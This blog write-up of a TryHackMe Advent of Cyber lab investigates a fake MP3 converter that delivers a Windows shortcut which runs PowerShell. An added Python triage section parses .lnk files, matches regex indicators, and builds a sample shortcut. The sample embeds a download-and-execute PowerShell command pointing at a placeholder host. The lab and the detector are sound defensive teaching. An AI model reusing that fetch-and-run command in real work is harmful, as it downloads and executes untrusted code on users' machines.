TryHackMe Advent of Cyber 2024 Day 1 Write-Up

Published on 2024-12-15

Category: Misc

Welcome to my write-up for Day 1 of TryHackMe’s Advent of Cyber 2024! Today, we kick things off by exploring a suspicious host provided in our virtual machine (VM) and AttackBox environment. At first glance, it appears to be a simple YouTube-to-MP3 converter. However, these types of sites—especially in the early 2010s—were notorious for bundling malware, phishing scams, or malvertising. I actually fell victim to one of these when I was about 10 years old, just trying to download free music onto my budget MP3 player.

Since we’re in a VM, it’s safe to test out the converter. Let’s try converting and downloading a file.

YouTube-to-MP3 converter screenshot

I pasted in a YouTube video—Rollin' by Limp Bizkit, which, funnily enough, might have been the exact song I tried to download when I was 10. The converter then prompted me to download a suspicious ZIP file, supposedly containing our newly converted MP3.

Downloading the suspicious file screenshot

Sure enough, after extraction, we end up with two files: somg.mp3 and song.mp3.

The extracted files

Next, I opened a terminal and used the file command to see if anything stood out.

Using the file command on the suspicious files

The output reveals that song.mp3 is likely a legitimate audio file, while somg.mp3 is actually a Windows shortcut. Let’s dig deeper with ExifTool to gather more metadata.

ExifTool analysis screenshot

We can see this file tries to run a PowerShell command with the -ep bypass (ExecutionPolicy Bypass) and -nop (NoProfile) flags, which disable the script execution policy and skip loading the user profile. It then uses DownloadFile to grab a remote script and save it in C:\ProgramData\. After downloading, it executes s.ps1 via the iex command (Invoke-Expression). This is a classic tactic for fetching and running malicious payloads.
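As an added example (not part of the write-up or the challenge), here is a small Python triage script that walks the Shell Link (MS-SHLLINK) layout to pull the relative path and arguments out of a .lnk file and flags the indicators described above. The sample shortcut bytes, the PLACEHOLDER.invalid host and the helper names are constructed for the demonstration, not the challenge's real file or URL.

```python
import re
import struct

# LinkFlags bits (ShellLinkHeader offset 20) from the MS-SHLLINK spec
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon"))

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (relative path, arguments, ...) of a Windows shortcut."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a Shell Link: HeaderSize must be 0x4C")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                 # fixed-size header ends here
    if flags & HAS_ID_LIST:                  # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (4 bytes) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1   # UTF-16LE or ANSI characters
    fields = {}
    for bit, key in STRING_FIELDS:           # each: CountCharacters (2 bytes) + chars, no terminator
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            fields[key] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += 2 + count * width
    return fields

# Indicators matching what the write-up observed in the shortcut's PowerShell command line
INDICATORS = {"execution policy bypass": r"-(ep|executionpolicy)\s+bypass",
              "profile disabled": r"-nop\b",
              "remote download": r"downloadfile|downloadstring",
              "invoke-expression": r"\biex\b|invoke-expression",
              "drops into ProgramData": r"c:\\programdata\\"}

def triage(filename: str, data: bytes) -> list:
    """Flag a shortcut posing as media, plus any risky PowerShell arguments it carries."""
    cmd = " ".join(parse_lnk(data).values()).lower()   # raises if not a .lnk
    hits = ["media extension on a Shell Link"] if filename.lower().endswith((".mp3", ".mp4", ".wav")) else []
    return hits + [label for label, pat in INDICATORS.items() if re.search(pat, cmd)]

def build_sample_lnk(rel_path: str, args: str) -> bytes:
    """Constructed test artifact (not the challenge file): minimal Unicode .lnk with an empty IDList."""
    flags = HAS_ID_LIST | IS_UNICODE | 0x08 | 0x20
    header = struct.pack("<I16sI52x", 0x4C, bytes.fromhex("0114020000000000c000000000000046"), flags)
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (rel_path, args))
    return header + struct.pack("<H", 2) + b"\x00\x00" + strings

SAMPLE_LNK = build_sample_lnk(r"..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"""-ep bypass -nop -c "(New-Object Net.WebClient).DownloadFile('http://PLACEHOLDER.invalid/s.ps1','C:\ProgramData\s.ps1'); iex C:\ProgramData\s.ps1" """)
```

Running `triage("somg.mp3", SAMPLE_LNK)` reproduces the write-up's findings as a list of labels; a genuine MP3 (which starts with an ID3 tag rather than a 0x4C header size) is rejected by `parse_lnk` before any pattern is checked.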

Curious about what that script contains, we open the link in a web browser and find a PowerShell script specifically designed to:

Contents of the malicious PowerShell script

In the script, we notice a comment stating: “Created by the one and only M.M.” A quick GitHub search for this string leads us to a repository issue discussing this exact script and tying it to a GitHub account. This is a solid lead, and we might uncover the attacker’s full identity in upcoming Advent of Cyber challenges.

GitHub repository issue screenshot
Second GitHub repository issue screenshot

Conclusion

The Day 1 challenge highlights how easy it can be to disguise malware as a simple YouTube-to-MP3 converter. If you’re using sites like this outside of a VM or sandbox, proceed with caution. Hopefully, as Advent of Cyber continues, we’ll learn more about “M.M.” and their operation.

Thanks for reading!